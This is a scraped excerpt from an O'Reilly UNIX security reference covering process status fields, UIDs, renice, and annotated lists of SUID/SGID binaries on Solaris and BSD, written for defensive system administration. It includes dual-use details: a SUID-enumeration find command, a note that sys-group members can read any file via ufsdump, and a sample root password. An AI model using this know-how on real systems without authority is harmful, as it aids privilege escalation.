%CPU, %MEM The percentage of the system's CPU and memory that the process is using<br />

SZ The amount of virtual memory that the process is using<br />

RSS The resident set size of the process - the amount of physical memory that the process is occupying<br />

TT The terminal that is controlling the process<br />

STAT A field denoting the status of the process; up to three letters (four under SunOS) are shown<br />

TIME CPU time used by the process<br />

COMMAND The name of the command (and arguments)<br />

[2] If this happens, follow up to be sure you don't have an intruder.<br />

Table C.3: . Runnability of Process<br />

(First Letter of STAT Field)<br />

Letter Meaning<br />

R Actually running or runnable<br />

S Sleeping (sleeping > 20 seconds)<br />

I Idle (sleeping < 20 seconds)<br />

T Stopped<br />

H Halted<br />

P In page wait<br />

D In disk wait<br />

Z Zombie<br />

Table C.4: . Whether Process Swapped (<strong>Sec</strong>ond Letter of STAT Field)<br />

Letter Meaning<br />

In core<br />

W Swapped out<br />

> A process that has exceeded a soft limit on memory requirements<br />

Table C.5: . Whether Process Is running with<br />

Altered CPU Schedule (Third Letter of STAT<br />

Field)<br />

Letter Meaning<br />

N The process is running at a low priority<br />

# nice (a number greater than 0).<br />

< The process is running at a high priority.<br />

NOTE: Because command arguments are stored in the process's own memory space, a process can change what appears<br />

on its command line. If you suspect that a process may not be what it claims to be, type:<br />

% ps -c<br />

This causes ps to print the name of the command stored in the kernel. This approach is substantially faster than the standard ps, and is<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_01.htm (4 of 7) [2002-04-12 10:45:19]


[Appendix C] <strong>UNIX</strong> Processes<br />

more suitable for use with scripts that run periodically. Unfortunately, the ps -c display does not include the arguments of each<br />

command that is running.<br />

C.1.3 Process Properties<br />

The kernel maintains a set of properties for every <strong>UNIX</strong> process. Most of these properties are denoted by numbers. Some of these<br />

numbers refer to processes, while others determine what privileges the processes have.<br />

C.1.3.1 Process identification numbers (PID)<br />

Every process is assigned a unique number called the process identifier, or PID. The first process to run, called init, is given the<br />

number 1. Process numbers can range from 1 to 65535.[3] When the kernel runs out of process numbers, it recycles them. The kernel<br />

guarantees that no two active processes will ever have the same number.<br />

[3] Some versions of <strong>UNIX</strong> may allow process numbers in a range different from 1 to 65535.<br />

C.1.3.2 Process real and effective UID<br />

Every <strong>UNIX</strong> process has two user identifiers: a real UID and an effective UID.<br />

The real UID (RUID) is the actual user identifier (UID) of the person who is running the program. It is usually the same as the UID<br />

of the actual person who is logged into the computer, sitting in front of the terminal (or workstation).<br />

The effective UID (EUID) identifies the actual privileges of the process that is running.<br />

Normally, the real UID and the effective UID are the same. That is, normally you have only the privileges associated with your own<br />

UID. Sometimes, however, the real and effective UID can be different. This occurs when a user runs a special kind of program,<br />

called a SUID program, which is used to accomplish a specific function (such as changing the user's password). SUID programs are<br />

described in Chapter 4, Users, Groups, and the Superuser.<br />

C.1.3.3 Process priority and niceness<br />

Although <strong>UNIX</strong> is a multitasking operating system, most computers that run <strong>UNIX</strong> can run only a single process at a time.[4] Every<br />

fraction of a second, the <strong>UNIX</strong> operating system rapidly switches between many different processes, so that each one gets a little bit<br />

of work done within a given amount of time. A tiny but important part of the <strong>UNIX</strong> kernel called the process scheduler decides<br />

which process is allowed to run at any given moment and how much CPU time that process should get.<br />

[4] Multiprocessor computers can run as many processes at a time as they have processors.<br />

To calculate which process it should run next, the scheduler computes the priority of every process. The process with the lowest<br />

priority number (or the highest priority) runs. A process's priority is determined with a complex formula that includes what the<br />

process is doing and how much CPU time the process has already consumed. A special number, called the nice number or simply the<br />

nice, biases this calculation: the lower a process's nice number, the higher its priority, and the more likely that it will be run.<br />

On most versions of <strong>UNIX</strong>, nice numbers are limited from -20 to +20. Most processes have a nice of 0. A process with a nice number<br />

of +19 will probably not run until the system is almost completely idle; likewise, a process with a nice number of -19 will probably<br />

preempt every other user process on the system.<br />

Sometimes you will want to make a process run slower. In some cases, processes take more than their "fair share" of the CPU, but<br />

you don't want to kill them outright. An example is a program that a researcher has left running overnight to perform mathematical<br />

calculations that isn't finished the next morning. In this case, rather than killing the process and forcing the researcher to restart it<br />

later from the beginning, you could simply cut the amount of CPU time that the process is getting and let it finish slowly during the<br />

day. The program /etc/renice lets you change a process's niceness.<br />

For example, suppose that Mike left a program running before he went home. Now it's late at night, and Mike's program is taking up<br />

most of the computer's CPU time:<br />

% ps aux | head -5<br />

USER PID %CPU %MEM VSIZE RSIZE TT STAT TIME COMMAND<br />

mike 211 70.0 6.7 2.26M 1.08M 01 R 4:01 cruncher<br />

mike 129 8.2 15.1 7.06M 2.41M 01 S 0:48 csh<br />

donna 212 7.0 7.3 2.56M 1.16M p1 S 1:38 csh<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_01.htm (5 of 7) [2002-04-12 10:45:19]


[Appendix C] <strong>UNIX</strong> Processes<br />

michelle 290 4.0 11.9 14.4M 1.91M 03 R 19:00 rogue %<br />

You could slow down Mike's program by renicing it to a higher nice number.<br />

For security reasons, normal users are only allowed to increase the nice numbers of their own processes. Only the superuser can<br />

lower the nice number of a process or raise the nice number of somebody else's process. (Fortunately, in this example, we know the<br />

superuser password!)<br />

% /bin/su<br />

password: another39<br />

# /etc/renice +4 211<br />

211: old priority 0, new priority 4<br />

# ps u211<br />

USER PID %CPU %MEM VSIZE RSIZE TT STAT TIME COMMAND<br />

mike 211 1.5 6.7 2.26M 1.08M 01 R N 4:02 cruncher<br />

The N in the STAT field indicates that the cruncher process is now running at a lower priority (it is "niced"). Notice that the process's<br />

CPU consumption has already decreased. Any new processes that are spawned by the process with PID 211 will inherit this new nice<br />

value, too.<br />

You can also use /etc/renice to lower the nice number of a process to make it finish faster.[5] Although setting a process to a lower<br />

priority won't speed up the CPU or make your computer's hard disk transfer data faster, the negative nice number will cause <strong>UNIX</strong> to<br />

run a particular process more than it runs others on the system. Of course, if you ran every process with the same negative priority,<br />

there wouldn't be any apparent benefit.<br />

[5] Only root can renice a process to make it faster. Normal processes can't even change themselves back to what they<br />

were (if they've been niced down). Normal users can't even raise the priority of their processes to the value at which they<br />

were started.<br />

Some versions of the renice command allow you to change the nice of all processes belonging to a user or all processes in a process<br />

group (described in the next section). For instance, to speed up all of Mike's processes, you might type:<br />

# renice -2 -u mike<br />

Remember, processes with a lower nice number run faster.<br />

Note that because of the <strong>UNIX</strong> scheduling system, renicing several processes to lower numbers is likely to increase paging activity if<br />

there is limited physical memory, and therefore adversely impact overall system performance.<br />

What do process priority and niceness have to do with security? If an intruder has broken into your system and you have contacted<br />

the authorities and are tracing the phone call, slowing the intruder down with a priority of +10 or +15 will limit the damage that the<br />

intruder can do without hanging up the phone (and losing your chance to catch the intruder). Of course, any time that an intruder is<br />

on a system, exercise extreme caution.<br />

Also, running your own shell with a higher priority may give you an advantage if the system is heavily loaded. The easiest way to do<br />

so is by typing:<br />

# renice -5 $$<br />

The shell will replace the $$ with the PID of the shell's process.<br />

C.1.3.4 Process groups and sessions<br />

With Berkeley-derived versions of <strong>UNIX</strong>, including SVR4, each process is assigned a process ID (PID), a process group ID, and a<br />

session ID. Process groups and sessions are used to implement job control.<br />

For each process, the PID is a unique number, the process group ID is the PID of the process group leader process, and the session ID<br />

is the PID of the session leader process. When a process is created, it inherits the process group ID and the session ID of its parent<br />

process. Any process may create a new process group by calling setpgrp() and may create a new session by calling the <strong>UNIX</strong> system<br />

call setsid(). All processes that have the same process group ID are said to be in the same process group.<br />

Each <strong>UNIX</strong> process group belongs to a session group. This is used to help manage signals and orphaned processes. Once a user has<br />

logged in, the user may start multiple sets of processes, or jobs, using the shell's job-control mechanism. A job may have a single<br />

process, such as a single invocation of the ls command. Alternatively, a job may have several processes, such as a complex shell<br />

pipeline. For each of these jobs, there is a process group. <strong>UNIX</strong> also keeps track of the particular process group which is controlling<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_01.htm (6 of 7) [2002-04-12 10:45:19]


[Appendix C] <strong>UNIX</strong> Processes<br />

the terminal. This can be set or changed with ioctl() system calls. Only the controlling process group can read or write to the terminal.<br />

A process could become an orphan if its parent process exits but it continues to run. Historically, these processes would be inherited<br />

by the init process but would remain in their original process group. If a signal were sent by the controlling terminal (process group),<br />

then it would go to the orphaned process, even though it no longer had any real connection to the terminal or the rest of the process<br />

group.<br />

To counter this, POSIX defines an orphaned process group. This is a process group where the parent of every member is either not a<br />

member of the process group's session, or is itself a member of the same process group. Orphaned process groups are not sent<br />

terminal signals when they are generated. Because of the way in which new sessions are created, the initial process in the first<br />

process group is always an orphan (its ancestor is not in the session). Command interpreters are usually spawned as session leaders so<br />

they ignore TSTP signals from the terminal.<br />

B.3 SUID and SGID Files C.2 Creating Processes<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_01.htm (7 of 7) [2002-04-12 10:45:19]


[Appendix B] B.3 SUID and SGID Files<br />

Appendix B<br />

Important Files<br />

B.3 SUID and SGID Files<br />

To run a secure computer, you must know of every SUID and SGID file on the system and be sure that each file has the<br />

proper permissions for which it was designed.<br />

Unfortunately, there is a huge amount of variation among <strong>UNIX</strong> vendors in the use of SUID and SGID. Some manufacturers<br />

use SUID root for all privilege-requiring programs, while some create special groups for controlling terminals (group tty), or<br />

disks (group operator), or memory (group kmem). Some vendors use a variety of approaches. Most change their approaches<br />

to SUID and SGID from software release to software release. As a result, any attempt to list SUID and SGID files on a<br />

system that is not constrained to a particular release is likely to be incomplete.<br />

You may also receive SUID or SGID files as part of third-party software that you may purchase or download from the net.<br />

Many of these third-party programs require SUID root permission because they modify devices or do things on behalf of<br />

users. If you choose to use these programs, you should seek assurance from the vendor that superuser privileges are confined<br />

to the smallest possible region of the program, and that, in general, rules such as those contained in Chapter 23, Writing<br />

<strong>Sec</strong>ure SUID and Network Programs, have been followed in coding the software. You may also wish to obtain written<br />

representations from the vendor that the security of the computer system will not be compromised as a result of SUID/SGID<br />

programs, and that, in the event that the system is compromised, the vendor will pay for damages.<br />

B.3.1 SUID/SGID Files in Solaris 2.4 (SVR4)<br />

This section contains a list of the SUID and SGID files found in Solaris 2.4, which is representative of System V Release 4<br />

systems in general. Rather than simply presenting a complete list of files, we have annotated the reason that SUID or SGID<br />

permissions are set. Our goal is to teach you how to recognize the SUID/SGID files on your system, and make your own<br />

decision as to whether the privilege is justified, or whether some lesser privilege would suffice.<br />

You can generate your own list of SUID files by using the command:<br />

# find / -type f -perm -04000 -ls<br />

You can generate a list of SGID files by using the command:<br />

# find / -type f -perm -02000 -ls<br />

B.3.1.1 SUID files<br />

-r-sr-xr-x 1 root sys 610480 Aug 3 1994 /sbin/su<br />

-r-sr-xr-x 1 root bin 559968 Aug 3 1994 /sbin/sulogin<br />

-r-sr-xr-x 1 root sys 15156 Jul 16 1994 /usr/bin/su<br />

The su command is SUID root so it can alter the process's effective UID. We don't understand why sulogin needs to be SUID<br />

root, because it is only run when the system boots in single-user mode (and, presumably, it is already running as root). The<br />

/sbin/su program is statically linked, which is why it is so much larger than /usr/bin/su, which uses shared libraries.<br />

-rwsr-xr-x 1 root sys 32144 Jul 15 1994 /usr/bin/at<br />

-rwsr-xr-x 1 root sys 12128 Jul 15 1994 /usr/bin/atq<br />

-rwsr-xr-x 1 root sys 10712 Jul 15 1994 /usr/bin/atrm<br />

The at commands are SUID root because they run commands for all user IDs, and need root permissions to set the user and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_03.htm (1 of 7) [2002-04-12 10:45:19]


[Appendix B] B.3 SUID and SGID Files<br />

group permissions of jobs. Additionally, the directory where these jobs are stored is protected to prevent snooping and<br />

tampering with the files, and root permissions are used to enforce these protections.<br />

-r-sr-xr-x 1 root sys 29976 Jul 16 1994 /usr/bin/chkey<br />

The chkey command is SUID root because it accesses the /etc/publickey database.<br />

-r-sr-xr-x 1 root bin 14600 Jul 15 1994 /usr/bin/cron<br />

The cron program is SUID root so that it can alter files in the /var/spool/cron directory. As with the at commands above, it<br />

also runs jobs under different user IDs and needs root privileges to do so.<br />

-r-sr-xr-x 1 root bin 9880 Jul 16 1994 /usr/bin/eject<br />

-r-sr-xr-x 1 root bin 22872 Jul 16 1994 /usr/bin/fdformat<br />

-r-sr-xr-x 1 root bin 4872 Jul 16 1994 /usr/bin/volcheck<br />

These programs are SUID root because they directly manipulate the floppy disk device.<br />

-r-sr-xr-x 1 root bin 27260 Jul 16 1994 /usr/bin/login<br />

login must be SUID root so that one user can use login to log in as another user without first logging out. If login were not<br />

SUID root, it could not change its real and effective UID to be that of another user. If the program is not SUID, then users<br />

need to log out before logging in as another user - a minor inconvenience. Many site administrators prefer this behavior and<br />

remove the SUID permission on login as a result.<br />

-rwsr-xr-x 1 root sys 9520 Jul 16 1994 /usr/bin/newgrp<br />

newgrp is SUID root because it must alter the process's effective and real group IDs (GIDS).<br />

-r-sr-sr-x 1 root sys 11680 Jul 16 1994 /usr/bin/passwd<br />

This program must be SUID root because it modifies the /etc/passwd or /etc/shadow files.<br />

-r-sr-xr-x 1 root sys 17800 Jul 16 1994 /usr/bin/ps<br />

-r-sr-xr-x 1 root bin 12080 Jul 16 1994 /usr/sbin/whodo<br />

These programs are SUID root because they need access to the computer's /dev/mem and /dev/kmem devices, and to access<br />

some accounting files. Perhaps a safer approach would be to have a kmem group and have needed files be SGID kmem.<br />

-r-sr-xr-x 1 root bin 15608 Jul 15 1994 /usr/bin/rcp<br />

-r-sr-xr-x 1 root bin 60268 Jul 15 1994 /usr/bin/rdist<br />

-r-sr-xr-x 1 root bin 14536 Jul 15 1994 /usr/bin/rlogin<br />

-r-sr-xr-x 1 root bin 7920 Jul 15 1994 /usr/bin/rsh<br />

-rwsr-xr-x 1 root other 7728 Jul 16 1994 /usr/bin/yppasswd<br />

-r-sr-x--x 1 root bin 134832 Jul 16 1994 /usr/lib/sendmail<br />

-r-sr-x--x 1 root bin 137552 Jul 16 1994 /usr/lib/sendmail.mx<br />

-r-sr-xr-x 1 root bin 17968 Jul 15 1994 /usr/sbin/ping<br />

-r-sr-xr-x 1 root bin 510532 Jul 15 1994 /usr/sbin/static/rcp<br />

In general, these programs are all SUID root because they need to create TCP/IP connections on ports below 1024. The<br />

sendmail program also needs the ability to modify files stored in its working directories. The ping program needs to use raw<br />

IP.<br />

-rws--x--x 1 uucp bin 55608 Jul 16 1994 /usr/bin/tip<br />

---s--x--x 1 root uucp 68816 Jul 15 1994 /usr/bin/ct<br />

---s--x--x 1 uucp uucp 81904 Jul 15 1994 /usr/bin/cu<br />

These programs are SUID uucp so that they can access the dialer and modem devices.<br />

-r-sr-xr-x 2 root bin 10888 Jul 16 1994 /usr/bin/uptime<br />

-r-sr-xr-x 2 root bin 10888 Jul 16 1994 /usr/bin/w<br />

We can't figure out why these programs are SUID root, as they access files (/var/adm/utmp and /dev/kstat) that are<br />

world-readable. These are hard links which you can verify by using ls -li.<br />

---s--x--x 1 uucp uucp 64240 Jul 15 1994 /usr/bin/uucp<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_03.htm (2 of 7) [2002-04-12 10:45:19]


[Appendix B] B.3 SUID and SGID Files<br />

---s--x--x 1 uucp uucp 21304 Jul 15 1994 /usr/bin/uuglist<br />

---s--x--x 1 uucp uucp 17144 Jul 15 1994 /usr/bin/uuname<br />

---s--x--x 1 uucp uucp 60952 Jul 15 1994 /usr/bin/uustat<br />

---s--x--x 1 uucp uucp 68040 Jul 15 1994 /usr/bin/uux<br />

---s--x--x 1 uucp uucp 4816 Jul 15 1994 /usr/lib/uucp/remote.unknown<br />

---s--x--x 1 uucp uucp 169096 Jul 15 1994 /usr/lib/uucp/uucico<br />

---s--x--x 1 uucp uucp 32016 Jul 15 1994 /usr/lib/uucp/uusched<br />

---s--x--x 1 uucp uucp 81040 Jul 15 1994 /usr/lib/uucp/uuxqt<br />

These programs are SUID uucp because they need to access privileged UUCP directories and files.<br />

-r-sr-xr-x 1 root bin 21496 Jul 16 1994 /usr/lib/exrecover<br />

This file is SUID root so that it can access the directory in which editor recovery files are saved. As we have said in other<br />

places in the book, a more secure approach would be to have an account specifically created for accessing this directory, or to<br />

create user-owned subdirectories in a common save directory.<br />

-r-sr-sr-x 1 root tty 151352 Jul 15 1994 /usr/lib/fs/ufs/ufsdump<br />

-r-sr-xr-x 1 root bin 605348 Jul 15 1994 /usr/lib/fs/ufs/ufsrestore<br />

These files are SUID root so that users other than the superuser can make backups. In the Solaris version of these commands,<br />

any user who is in the sys group can dump the contents of the system's disks and restore them without having root access. (As<br />

a result, having sys access on this operating system means that you can effectively read any file on the computer by using a<br />

combination of ufsdump and ufsrestore.) Note: the fact that users in the sys group can dump and undump tapes is not<br />

documented in the man page. Other programs may give undocumented privileges to users who happen to be in particular<br />

groups.<br />

-rwsr-xr-x 1 root adm 4008 Jul 15 1994 /usr/lib/acct/accton<br />

There must be some reason that this program is SUID root. But, once again, we can't figure it out, as the program gives the<br />

error "permission denied" when it is run by anybody other than the superuser.<br />

-rwsr-xr-x 3 root bin 13944 Jul 16 1994 /usr/sbin/allocate<br />

-rwsr-xr-x 3 root bin 13944 Jul 16 1994 /usr/sbin/deallocate<br />

-rwsr-xr-x 3 root bin 13944 Jul 16 1994 /usr/sbin/list_devices<br />

The allocate command allocates devices to users based on the Solaris allocation mechanism. For more information, refer to<br />

the Solaris documentation. We believe that the mkdevalloc and mkdevmaps commands are part of the same system, but they<br />

are not documented.<br />

-rwsr-xr-x 1 root sys 21600 Jul 16 1994 /usr/sbin/sacadm<br />

The sacadm is the top-level entry point into the Service Access Facility system.<br />

-rwsrwxr-x 1 root bin 87808 Jun 24 1994 /usr/openwin/bin/xlock<br />

We think that xlock needs to be SUID root so that it can read your password from the shadow file.<br />

-r-sr-sr-x 1 root sys 20968 Jun 27 1995 /usr/dt/bin/dtaction<br />

-r-sr-xr-x 1 root bin 69172 Jun 27 1995 /usr/dt/bin/dtappgather<br />

-r-sr-xr-x 1 root bin 134600 Jun 27 1995 /usr/dt/bin/dtsession<br />

-r-sr-xr-x 1 root bin 373332 Jun 27 1995 /usr/dt/bin/dtprintinfo<br />

-r-sr-sr-x 1 root daemon 278060 Jun 27 1995 /usr/dt/bin/sdtcm_convert<br />

These programs all appear to perform session management as part of the Common Desktop Environment 1.0. We don't know<br />

why dtaction needs to be SUID root.<br />

B.3.1.2 Undocumented SUID programs<br />

The following programs are SUID and undocumented. This combination is dangerous, because there is no way to tell for sure<br />

what these programs are supposed to do, if they have their SUID/SGID bits properly set, or if they are even part of the<br />

standard operating system release.<br />

---s--x--x 1 root bin 3116 Jul 16 1994 /usr/lib/pt_chmod<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_03.htm (3 of 7) [2002-04-12 10:45:19]


[Appendix B] B.3 SUID and SGID Files<br />

-r-sr-xr-x 1 root bin 5848 Jul 16 1994 /usr/lib/utmp_update<br />

-rwsr-xr-x 1 root bin 8668 Jul 16 1994 /usr/sbin/mkdevalloc<br />

-rwsr-xr-x 1 root bin 9188 Jul 16 1994 /usr/sbin/mkdevmaps<br />

-r-sr-sr-x 1 root bin 14592 Jul 15 1994 /usr/openwin/bin/ff.core<br />

-rwsr-xr-x 1 root bin 19580 Jun 24 1994 /usr/openwin/lib/mkcookie<br />

-rwsr-sr-x 1 bin bin 8288 Jul 16 1994 /usr/vmsys/bin/chkperm<br />

-r-sr-xr-x 1 lp lp 203 Jul 18 1994 /etc/lp/alerts/printer<br />

B.3.1.3 SGID files<br />

-rwxr-sr-x 1 root sys 147832 Jul 15 1994 /usr/kvm/crash<br />

-r-xr-sr-x 1 bin sys 31440 Jul 15 1994 /usr/bin/netstat<br />

-r-xr-sr-x 1 bin sys 11856 Jul 16 1994 /usr/bin/nfsstat<br />

-r-xr-sr-x 1 bin sys 11224 Jul 16 1994 /usr/bin/ipcs<br />

-r-xr-sr-x 1 root bin 6912 Jul 15 1994 /usr/sbin/arp<br />

-r-xr-sr-x 1 bin sys 6280 Jul 16 1994 /usr/sbin/fusage<br />

-r-xr-sr-x 1 root sys 15128 Jul 16 1994 /usr/sbin/prtconf<br />

-r-xr-sr-x 1 bin sys 7192 Jul 16 1994 /usr/sbin/swap<br />

-r-xr-sr-x 1 root sys 21416 Jul 16 1994 /usr/sbin/sysdef<br />

-r-xr-sr-x 1 bin sys 5520 Jul 15 1994 /usr/sbin/dmesg<br />

-rwxr-sr-x 1 root sys 12552 Jul 18 1994 /usr/openwin/bin/wsinfo<br />

-rwxrwsr-x 1 root sys 9272 Jul 18 1994 /usr/openwin/bin/xload<br />

These programs examine and/or modify memory of the running system and use group permissions to read the necessary<br />

device files.<br />

-r-xr-sr-x 1 bin sys 28696 Jul 16 1994 /usr/kvm/eeprom<br />

The eeprom program allows you to view or modify the contents of the system's EEPROM. It should probably not be<br />

executable by non-root users.<br />

-r-x--s--x 1 bin mail 65408 Jul 16 1994 /usr/bin/mail<br />

-r-x--s--x 1 bin mail 132888 Jul 16 1994 /usr/bin/mailx<br />

-r-xr-sr-x 1 root mail 449960 Jul 15 1994 /usr/openwin/bin/mailtool<br />

-r-xr-sr-x 1 bin mail 825220 Jun 27 1995 /usr/dt/bin/dtmail<br />

-r-xr-sr-x 1 bin mail 262708 Jun 27 1995 /usr/dt/bin/dtmailpr<br />

The mail programs can be used to send mail or read mail in the /var/mail directory. We are not certain why these programs<br />

need to be SGID mail,; however, we suspect it involves lock management.<br />

-r-sr-sr-x 1 root sys 20968 Jun 27 1995 /usr/dt/bin/dtaction<br />

This is another part of the Common Desktop Environment system. We don't know why it is both SUID and SGID.<br />

-r-sr-sr-x 1 root sys 11680 Jul 16 1994 /usr/bin/passwd<br />

We do not know why this program needs to be both SUID root and SGID sys.<br />

-r-xr-sr-x 1 bin tty 9984 Jul 16 1994 /usr/bin/write<br />

-r-sr-sr-x 1 root tty 151352 Jul 15 1994 /usr/lib/fs/ufs/ufsdump<br />

-r-xr-sr-x 1 bin tty 9296 Jul 16 1994 /usr/sbin/wall<br />

These programs are SGID tty so that they can write on the devices of users.<br />

-rwxr-sr-x 1 root root 650620 Jun 24 1994 /usr/openwin/bin/Xsun<br />

Xsun is the X-Window server for the Sun. It is SGID so that it can access necessary device files.<br />

-r-sr-sr-x 1 root daemon 278060 Jun 27 1995 /usr/dt/bin/sdtcm_convert<br />

This program converts files from the Open Windows calendar data format version 3 to version 4. According to the<br />

documentation, sdtcm_convert must be run by the superuser or the owner of the calendar. Users can only run the program on<br />

their own calendars; the superuser can run the program on any calendar. Because the /var/spool/calendar directory is mode<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_03.htm (4 of 7) [2002-04-12 10:45:19]


[Appendix B] B.3 SUID and SGID Files<br />

3777, there should be no reason for this program to be SUID or SGID.<br />

B.3.1.4 Undocumented SGID files<br />

These files are not documented in the Solaris system documentation:<br />

-r-sr-sr-x 1 root bin 14592 Jul 15 1994 /usr/openwin/bin/ff.core<br />

-rwsr-sr-x 1 bin bin 8288 Jul 16 1994 /usr/vmsys/bin/chkperm<br />

B.3.2 SUID/SGID Files in Berkeley <strong>UNIX</strong><br />

This list of SUID and SGID files in Berkeley <strong>UNIX</strong> was derived by looking at computers made by Sun Microsystems, Digital<br />

Equipment Corporation, and NeXT Inc. The list of SUID and SGID files on your version of Berkeley <strong>UNIX</strong> is likely to be<br />

different. For this reason, we not only list which files are SUID and SGID, we also explain why they are SUID or SGID. After<br />

reading this list, you should be able to look at all of the SUID and SGID files on your system and figure out why your files<br />

have been set in particular ways. If you have a question about a file that is SUID or SGID, consult your documentation or<br />

contact your vendor.<br />

B.3.2.1 SUID files<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/etc/ping<br />

ping must be SUID root so that it can transmit ICMP ECHO requests on the raw IP port.<br />

-r-s--x--x 1 root wheel 16384 Aug 18 1989 /usr/etc/timedc<br />

The timedc (Time Daemon Control) program must be SUID root so that it can access the privileged time port.<br />

-r-sr-x--x 3 root wheel 81920 Sep 7 1989 /usr/lib/sendmail<br />

-r-sr-x--x 3 root wheel 81920 Sep 7 1989 /usr/bin/newaliases<br />

-r-sr-x--x 3 root wheel 81920 Sep 7 1989 /usr/bin/mailq<br />

These programs are all hard links to the same binary. The sendmail program must be SUID root because it listens on TCP/IP<br />

port 25, which is privileged.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 15 1989 /usr/lib/ex3.7recover<br />

-rwsr-xr-x 1 root wheel 16384 Aug 15 1989 /usr/lib/ex3.7preserve<br />

These programs, part of the vi editor system, must be SUID root so they can read and write the backup files used by vi.<br />

(These are often SGID preserve.)<br />

-rws--x--x 1 root wheel 40960 Nov 15 1989 /usr/lib/lpd<br />

-rws--s--x 1 root daemon 24576 Sep 6 1989 /usr/ucb/lpr<br />

-rws--s--x 1 root daemon 24576 Sep 6 1989 /usr/ucb/lpq<br />

-rws--s--x 1 root daemon 24576 Sep 6 1989 /usr/ucb/lprm<br />

The line-printer daemon must be SUID root so it can listen on TCP/IP port 515, the printer port, and so can read and write<br />

files in the /usr/spool/lpd directory. Likewise, the line-printer user commands must be SUID so they can access spool files<br />

and the printer device.<br />

-rwsr-xr-x 1 root wheel 24576 Aug 18 1989 /bin/ps<br />

-rwsr-xr-x 2 root wheel 57344 Aug 18 1989 /usr/ucb/w<br />

-rwsr-xr-x 2 root wheel 57344 Aug 18 1989 /usr/ucb/uptime<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/bin/iostat<br />

These programs must be SUID root because they need to read the kernel's memory to generate the statistics that they print.<br />

On some systems, these programs are distributed SGID kmem, and /dev/kmem is made readable only by this group. This<br />

second approach is more secure than the first approach.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/ucb/quota<br />

The quota command must be SUID root so that it can read the quota file.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/ucb/rcp<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_03.htm (5 of 7) [2002-04-12 10:45:19]


[Appendix B] B.3 SUID and SGID Files<br />

-rwsr-x--x 1 root wheel 32768 Aug 18 1989 /usr/ucb/rdist<br />

-rwsr-xr-x 1 root wheel 16384 Aug 23 1989 /usr/ucb/rlogin<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/ucb/rsh<br />

-rwsr-sr-x 1 root tty 32768 Nov 11 17:17 /usr/etc/rdump<br />

These programs must be SUID root because they use privileged ports to do username authentication.<br />

-rwsr-xr-x 1 daemon wheel 16384 Aug 18 1989 /usr/bin/atq<br />

-rwsr-xr-x 1 daemon wheel 16384 Aug 18 1989 /usr/bin/at<br />

-rwsr-xr-x 1 daemon wheel 16384 Aug 18 1989 /usr/bin/atrm<br />

These programs must be SUID because they access and modify spool files that are kept in privileged directories.<br />

-rws--x--x 2 root daemon 205347 Sep 29 10:14 /usr/bin/tip<br />

-rws--x--x 2 root daemon 205347 Sep 29 10:14 /usr/bin/cu<br />

tip and cu, which are both hard links to the same binary, must be SUID root so that they can have physical access to the<br />

modem device. On some systems, these files may be SUID UUCP.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /bin/login<br />

login must be SUID root so that one user can use login to log in as another user, without first logging out. If login were not<br />

SUID root, it could not change its real and effective UID to be that of another user.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 21 1989 /bin/mail<br />

mail must be SUID root so that it can append messages to a user's mail file.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /bin/passwd<br />

-rwsr-xr-x 1 root system 28672 Feb 21 1990 /usr/ucb/chsh<br />

-rwsr-xr-x 1 root system 28672 Feb 21 1990 /usr/ucb/chfn<br />

These programs must be SUID root because they modify the /etc/passwd file.<br />

-rwsr-xr-x 1 root wheel 16384 Sep 3 1989 /bin/su<br />

su must be SUID root so it can change its process's effective UID to that of another user.<br />

--s--s--x 1 uucp daemon 24576 Sep 3 1989 /usr/bin/uucp<br />

--s--s--x 1 uucp daemon 24576 Sep 3 1989 /usr/bin/uux<br />

--s--s--x 1 uucp daemon 16384 Sep 3 1989 /usr/bin/uulog<br />

--s--s--x 1 uucp daemon 16384 Sep 3 1989 /usr/bin/uuname<br />

--s--s--x 1 uucp daemon 16384 Sep 3 1989 /usr/bin/uusnap<br />

--s--s--x 1 uucp daemon 24576 Sep 3 1989 /usr/bin/uupoll<br />

--s--s--x 1 uucp daemon 16384 Sep 3 1989 /usr/bin/uuq<br />

--s--s--x 2 uucp daemon 16384 Sep 3 1989 /usr/bin/uusend<br />

--s--s--x 2 uucp daemon 16384 Sep 3 1989 /usr/bin/ruusend<br />

--s--s--x 1 uucp daemon 90112 Sep 3 1989 /usr/lib/uucp/uucico<br />

--s--s--x 1 uucp daemon 24576 Sep 3 1989 /usr/lib/uucp/uuclean<br />

--s--s--- 1 uucp daemon 32768 Sep 3 1989 /usr/lib/uucp/uuxqt<br />

--s--x--x 1 uucp daemon 32768 Feb 21 1990 /usr/var/uucp/uumonitor<br />

--s--x--x 1 uucp daemon 86016 Feb 21 1990 /usr/var/uucp/uucompact<br />

--s--x--x 1 uucp daemon 77824 Feb 21 1990 /usr/var/uucp/uumkspool<br />

--s------ 1 uucp daemon 90112 Feb 21 1990 /usr/var/uucp/uurespool<br />

These UUCP files are SUID uucp so they can access and modify the protected UUCP directories. Not all of these will be<br />

SUID in every system.<br />

-rwsr-xr-x 1 root system 954120 Jun 8 03:58 /usr/bin/X11/xterm<br />

-rwsr-xr-x 1 root system 155648 Nov 16 1989 /usr/lib/X11/getcons<br />

